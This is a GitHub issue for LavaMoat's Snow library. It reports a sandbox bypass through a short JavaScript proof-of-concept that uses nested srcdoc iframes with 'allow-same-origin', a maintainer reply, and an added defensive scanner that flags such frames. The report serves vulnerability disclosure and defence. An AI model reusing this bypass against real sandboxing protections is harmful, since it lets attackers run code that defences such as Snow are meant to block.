LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!
https://lavamoat.github.io/snow/demo/
MIT License

Bypass using iframe sandbox #92

Closed mmndaniel closed 1 year ago

mmndaniel commented 1 year ago
var d = document.createElement('div');
document.body.appendChild(d);
d.innerHTML =  `<iframe
    srcdoc="<iframe sandbox='allow-same-origin' src='javascript:alert(1)'></iframe><script>frames[0].alert.call(top, 1);</script>"
</iframe>`;

Same idea as https://github.com/LavaMoat/snow/issues/90, just using sandbox to break the internal SNOW_WINDOW call :)
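
The PoC above depends on a frame sandboxed with `allow-same-origin` but without `allow-scripts`: no script can run inside it, yet it stays same-origin with its embedder. As an added example (not part of the original issue and not Snow's code), this Node.js sketch audits markup for that combination and follows nested `srcdoc` documents; the function names and sample markup are constructed for illustration, and the regex scanner is a simplification of real HTML parsing.

```javascript
// Added example, not Snow's code. Simplified regex scanner, not a full HTML parser.

// Decode the entities that commonly appear inside a srcdoc attribute value.
function decodeEntities(s) {
  return s.replace(/&lt;/g, '<').replace(/&gt;/g, '>')
    .replace(/&quot;/g, '"').replace(/&#39;/g, "'").replace(/&amp;/g, '&');
}

// Parse one start tag's attribute text into a lower-cased name -> value map.
function parseAttrs(tagSource) {
  const attrs = Object.create(null);
  const re = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(tagSource)) !== null) {
    const name = m[1].toLowerCase();
    // First occurrence of an attribute wins, as in the HTML tokenizer.
    if (!(name in attrs)) attrs[name] = decodeEntities(m[2] ?? m[3] ?? m[4] ?? '');
  }
  return attrs;
}

// Report every iframe that keeps its embedder's origin but cannot run script,
// descending into srcdoc documents (depth-limited to stop runaway nesting).
function findScriptlessSameOriginFrames(html, depth = 0, path = 'top') {
  const findings = [];
  if (depth > 8) return findings;
  const tagRe = /<iframe\b((?:"[^"]*"|'[^']*'|[^>"'])*)>/gi;
  let m, index = 0;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = parseAttrs(m[1]);
    const here = `${path}>iframe[${index++}]`;
    if ('sandbox' in attrs) {
      const tokens = new Set(attrs.sandbox.toLowerCase().split(/\s+/).filter(Boolean));
      if (tokens.has('allow-same-origin') && !tokens.has('allow-scripts')) {
        findings.push({ path: here, sandbox: attrs.sandbox });
      }
    }
    if ('srcdoc' in attrs) {
      findings.push(...findScriptlessSameOriginFrames(attrs.srcdoc, depth + 1, here));
    }
  }
  return findings;
}

// Constructed sample markup: only the frame nested in srcdoc should be reported.
const SAMPLE = `
<iframe src="/widget.html" sandbox="allow-scripts"></iframe>
<iframe srcdoc="<p>hi</p><iframe sandbox='allow-same-origin' src='about:blank'></iframe>"></iframe>
<iframe sandbox="allow-same-origin allow-scripts" src="/a.html"></iframe>
<iframe sandbox src="/b.html"></iframe>`;
console.log(findScriptlessSameOriginFrames(SAMPLE));
```
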

weizman commented 1 year ago

Seems like #101 will fix this issue as well as #93.